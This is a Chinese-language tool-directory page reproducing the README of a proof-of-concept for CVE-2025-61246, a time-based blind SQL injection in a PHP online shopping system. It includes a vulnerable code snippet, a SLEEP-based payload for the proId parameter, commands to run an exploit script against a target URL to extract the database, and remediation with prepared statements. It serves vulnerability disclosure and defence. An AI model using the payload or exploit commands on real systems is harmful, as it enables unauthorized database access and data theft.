Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-61246 — CVE-2025-61246: SQL Injection vulnerability PoC in Online Shopping System PHP | Kitploit
工具/GitHubGitHub/hackergovind/cve-2025-61246
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHubhackergovind/cve-2025-61246

CVE-2025-61246

CVE-2025-61246: SQL Injection vulnerability PoC in Online Shopping System PHP

查看仓库
7个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-61246 - 在线购物系统 SQL 注入漏洞

CVE Severity CVSS

概述

本仓库包含 CVE-2025-61246 的概念验证(PoC),该漏洞是 PHP 在线购物系统应用程序中发现的严重 SQL 注入漏洞。攻击者可通过时间盲注利用该漏洞执行任意 SQL 命令。

漏洞详情

  • CVE ID:CVE-2025-61246
  • 漏洞类型:SQL 注入(时间盲注)
  • 受影响组件:/online-shopping-system-php-master/review_action.php
  • 受影响版本:1.0
  • 易受攻击参数:proId
  • 攻击向量:网络(CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
  • 严重性:严重(CVSS 评分:9.8)
  • 发现者:Govind Pratap Singh

技术描述

漏洞存在于 review_action.php 端点,用户通过 proId 参数提供的输入未经适当清理或使用参数化查询,直接拼接到 SQL 查询中。这使得攻击者可以注入恶意 SQL 载荷,从而:

  • 提取敏感数据库信息
  • 绕过身份验证机制
  • 修改或删除数据库记录
  • 执行管理操作

存在漏洞的代码示例

root@kitploit:~
// 存在漏洞的代码(示例)
$proId = $_POST['proId'];
$query = "SELECT * FROM products WHERE id = " . $proId;
mysqli_query($conn, $query);

攻击向量

攻击者可通过以下方式利用此漏洞:

  1. 向 /online-shopping-system-php-master/review_action.php 发送构造的 POST 请求
  2. 在 proId 参数中包含恶意 SQL 载荷
  3. 使用时间盲注 SQL 注入技术提取数据
  4. 利用漏洞获得对数据库的未授权访问

示例载荷

root@kitploit:~
proId=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -

概念验证

本仓库包含:

  1. 自动化利用脚本(exploit.py)——用于检测和利用漏洞的 Python 脚本
  2. 手动测试指南(MANUAL_TESTING.md)——手动利用的分步说明
  3. 易受攻击应用程序设置(docker-compose.yml)——用于安全测试的 Docker 环境
  4. 修复指南(REMEDIATION.md)——安全编码实践和补丁

安装与使用

前提条件

root@kitploit:~
Python 3.7+
pip install -r requirements.txt

快速开始

root@kitploit:~
# 克隆仓库
git clone https://github.com/hackergovind/CVE-2025-61246.git
cd CVE-2025-61246

# 安装依赖
pip install -r requirements.txt

# 运行利用脚本
python exploit.py --url http://target.com/online-shopping-system-php-master/review_action.php

高级用法

root@kitploit:~
# 仅检测(不进行利用)
python exploit.py --url http://target.com/review_action.php --detect-only

# 提取数据库名称
python exploit.py --url http://target.com/review_action.php --extract-db

# 完全利用,自定义超时
python exploit.py --url http://target.com/review_action.php --timeout 10 --full-exploit

# 使用代理进行测试
python exploit.py --url http://target.com/review_action.php --proxy http://127.0.0.1:8080

影响

成功利用此漏洞可能导致:

  • 数据泄露:提取敏感用户信息、凭证和支付数据
  • 身份验证绕过:未授权访问管理功能
  • 数据篡改:修改或删除关键数据库记录
  • 完全系统沦陷:在某些配置下可能实现远程代码执行

修复措施

立即行动

  1. 实施输入验证:对所有用户提供的数据进行严格的输入验证
  2. 使用参数化查询:用预处理语句替换动态 SQL
  3. 部署 WAF 规则:配置 Web 应用防火墙规则以阻止 SQL 注入尝试
  4. 更新应用程序:应用最新的安全补丁

安全代码示例

root@kitploit:~
// 使用预处理语句的安全实现
$proId = $_POST['proId'];
$stmt = $conn->prepare("SELECT * FROM products WHERE id = ?");
$stmt->bind_param("i", $proId);
$stmt->execute();
$result = $stmt->get_result();

有关详细的修复步骤,请参阅 REMEDIATION.md。

参考

  • OWASP SQL 注入
  • CWE-89:SQL 注入

免责声明

⚠️ 重要提示:此 PoC 仅用于教育目的和授权安全测试。未经授权访问计算机系统是非法的。作者对滥用此信息不承担任何责任。请务必在测试前获得适当授权。

作者

Govind Pratap Singh

  • GitHub:@hackergovind
  • 邮箱:[email protected]
  • Medium:https://medium.com/@govindsinghpratap123

许可证

本项目采用 MIT 许可证 - 详情请参阅 LICENSE 文件。

致谢

  • MITRE CVE 分配团队
  • OWASP 基金会
  • 安全研究社区

负责任披露:如果您发现安全漏洞,请以负责任的方式在公开披露前向供应商报告。

下载工具